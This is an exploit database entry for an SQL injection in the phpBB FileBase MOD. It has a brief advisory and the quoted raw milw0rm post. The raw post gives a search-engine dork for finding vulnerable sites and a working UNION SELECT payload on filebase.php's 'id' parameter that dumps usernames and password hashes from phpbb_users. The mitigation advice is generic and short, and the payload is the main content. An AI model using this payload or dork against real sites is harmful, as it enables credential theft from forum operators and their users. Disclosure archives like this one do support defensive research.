[phpBB MOD] FileBase SQL Injection Vulnerbilitys

vendor:

phpBB MOD FileBase

by:

t0pP8uZz & xprog

8.5

CVSS

HIGH

SQL Injection

CWE

Product Name: phpBB MOD FileBase

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

[phpBB MOD] FileBase SQL Injection Vulnerbilitys

A vulnerability exists in the FileBase MOD for phpBB, which can be exploited by malicious people to conduct SQL injection attacks. Input passed to the 'id' parameter in 'filebase.php' isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow execution of arbitrary SQL commands.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in order to prevent SQL injection attacks.

Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		    [phpBB MOD] FileBase SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--


AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: inurl:"filebase.php" "Powered by phpBB"


DESCRIPTION: 


EXPLOITS:
filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*


NOTE/TIP: 
phpbb prefix may need changining.


GREETZ: milw0rm.com, h4ck-y0u.org !


--==+================================================================================+==--
--==+		    [phpBB MOD] FileBase SQL Injection Vulnerbilitys	             +==--
--==+================================================================================+==--

# milw0rm.com [2008-03-11]